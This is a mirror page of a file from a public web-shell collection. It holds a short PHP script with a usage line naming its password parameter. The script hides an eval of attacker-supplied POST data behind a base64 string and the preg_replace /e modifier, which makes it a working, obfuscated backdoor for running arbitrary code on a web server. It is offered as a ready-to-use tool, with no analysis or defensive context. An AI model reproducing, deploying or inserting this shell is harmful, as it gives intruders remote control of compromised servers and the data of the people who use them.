mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
b09d2eadcc
usage : shell.php?x=1 password "x" or shell.php password "x"
6 lines
153 B
PHP
6 lines
153 B
PHP
<?php
|
|
@$a = $_POST['x'];
|
|
if(isset($a)){
|
|
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
|
|
}
|
|
?>
|